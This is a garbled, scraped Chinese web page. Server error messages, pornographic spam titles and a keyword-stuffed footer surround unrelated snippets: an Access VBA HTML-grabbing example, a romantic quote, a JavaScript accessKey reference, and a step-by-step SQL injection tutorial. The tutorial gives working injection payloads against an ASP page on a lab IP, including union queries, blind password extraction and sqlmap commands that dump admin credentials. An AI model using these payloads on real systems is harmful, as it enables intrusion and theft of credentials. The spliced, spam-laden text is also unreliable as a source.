Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 草草影院ccyy国产日本欧美,成人久久18免费网站游戏,亚洲春色第一页

          整合營銷服務商

          電腦端+手機端+微信端=數據同步管理

          免費咨詢熱線:

          「Access示例」獲取網頁的Html代碼

          要代碼:

          Dim doc, objhtml As Object

          Dim i As Integer

          Dim strhtml As String

          If Not Me.WebBrowser1.Busy Then

          Set doc = WebBrowser1.Document

          i = 0

          Set objhtml = doc.body.createtextrange()

          If Not IsNull(objhtml) Then

          Text1 = objhtml.htmltext

          End If

          End If

          ?

          示例下載:( 在“了解更多”里下載)

          圖 示:

          鐘書在《圍成》里寫到:“約著見一面,就能使見面的前后幾天都沾著光,變成好日子”,是啊,只要能見你,雀躍的心情都會被拉得好長好長。感情就是這樣,原則抵不過我樂意,你有你的打算,我有我的目的,因為我喜歡你,我所做的一切都是想跟你在一起。。。

          ---- 網易云熱評

          一、網站分類

          1、靜態網頁

          html或者htm是靜態頁面,不需要服務器解析其中的腳本

          特點:不依賴數據庫,靈活性差,制作、更新、維護麻煩,交互性差,功能受限制,安全,不存在數據庫注入漏洞


          2、動態頁面

          asp/aspx/php/jsp等,由相應的腳本引擎來解釋執行

          特點:以來數據庫,靈活性好、交互性好、不安全,存在數據庫注入漏洞


          二、網站訪問流程


          三、漏洞產生原因

          目標網址:www.aiyou.com/new.php?id=23

          1、正常流程數據庫返回給網站new頁面id為23的信息

          2、將參數值23修改為其他的sql語句

          3、網站未對該指令進行檢測

          4、服務器執行了新的語句,并返回給網站

          5、客戶端根據返回的信息可以繼續進一步注入


          四、sql注入的危害

          1、數據庫信息泄露

          2、網頁被篡改

          3、網頁被掛馬

          4、數據庫被惡意操作

          5、服務器被遠程控制

          6、破快硬盤數據


          五、access數據庫

          一般配合asp腳本使用,存儲數據不能大于100M,只有一個數據庫名稱,可以創建多個表

          1、數據庫后綴:*.mdb


          2、asp鏈接access數據庫

          <%
              dim conn,connstr,db
              db="Your.mdb"
              Set conn = Server.CreateObject("ADODB.Connection")
              connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
              conn.Open connstr
          %>


          3、常用打開工具EasyAccess


          4、漏洞判斷

          目標:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513

          判斷注入點:

          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513/ 報錯,可能存在注入


          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 返回正常

          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 返回錯誤 存在注入

          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exsits (select * from msysobjects) > 0 判斷access數據庫,根據錯誤提示在msysobjects上沒有讀取數據權限,說明表存在,從而知道是access數據庫


          5、查詢access數據空中的表

          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from user) 根據錯誤判斷除滅有user表


          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from admin) 正常返回,說明存在admin表


          6、判斷列名

          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select password from admin),正常返回,說明存在列名password

          常用用戶名:name username user_name admin adminuser admin_user admin_username adminname

          常用密碼名:password pass userpass user_pass pwd userpwd adminpwd admin_pwd


          7、判斷表的列數

          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 ,正常返回說明有22列,如果沒有正常繼續修改該數字


          8、聯合查詢

          http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin,知道admin表一共有22列,所以聯合查詢需要輸入1-22,頁面只顯示3和15,可以修改該兩列獲取想要的數值


          六、另一種方法判斷:

          1、http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and select len(password) from admin)=16 判斷密碼的長度,返回正常,說明密碼長度為16。


          2、 http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 判斷密碼的第一位,返回正常,說明密碼的第一位是a

          判斷第二位,成功后修改該值,依次判斷剩下的密碼

          七、sqlmap工具利用

          目標地址:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513

          1、測試是否存在漏洞

          sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513"


          2、獲取表名

          sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --tables


          3、獲取列名

          sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin


          4、獲取指定列的內容

          sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" -T admin -C admin,password --dump


          禁止非法,后果自負

          歡迎關注公眾號:web安全工具庫

          義和用法

          accessKey 屬性設置或返回元素的快捷鍵。

          快捷鍵規定激活元素或使元素獲得焦點的快捷鍵。

          注釋:在不同的瀏覽器中訪問快捷鍵的方式各有不同

          IE、Chrome、Safari 使用 [Alt] + accessKey 為擁有指定快捷鍵的元素賦予焦點。

          Firefox 使用 [Alt] [Shift] + accesskey 獲取焦點;

          語法

          HTMLElementObject.accessKey=accessKey
          

          在Chrome瀏覽器中安Alt + S 就會獲取焦點

          提示:如果超過一個元素擁有相同的快捷鍵,那么:

          • IE, Firefox: 激活下一個被按下快捷鍵的元素
          • Chrome, Safari: 激活最后一個被按下快捷鍵的元素
          • Opera: 激活第一個被按下快捷鍵的元素

          主站蜘蛛池模板: 精品乱码一区二区三区在线| 久久精品国产一区二区三| 中文字幕精品无码一区二区 | 一区二区亚洲精品精华液| 国产丝袜视频一区二区三区| 国产色综合一区二区三区| 国产Av一区二区精品久久| 亚洲毛片αv无线播放一区| 精品国产不卡一区二区三区 | 亚洲色无码专区一区| 国产一区二区在线看| 国产在线精品一区二区高清不卡 | 国产一区二区三区视频在线观看| 东京热无码一区二区三区av | 日本片免费观看一区二区| 亚洲AV无码一区二区三区久久精品| 精品福利一区二区三| A国产一区二区免费入口| 福利在线一区二区| 日本免费一区二区三区最新vr| 麻豆AV一区二区三区| 人妻少妇久久中文字幕一区二区| 久久精品免费一区二区三区 | 暖暖免费高清日本一区二区三区| 无码播放一区二区三区| 99无码人妻一区二区三区免费| 亚洲综合一区二区| 亚洲一区二区三区精品视频| 亚洲一区二区三区免费在线观看| 久久精品国产第一区二区三区| 日本一区二区免费看| 日产精品久久久一区二区| 麻豆AV一区二区三区久久| 亚洲午夜在线一区| 亚洲av色香蕉一区二区三区| 日韩福利视频一区| 日本一区二区三区在线网 | 国内国外日产一区二区| 日韩精品在线一区二区| 久久亚洲综合色一区二区三区| 午夜影视日本亚洲欧洲精品一区|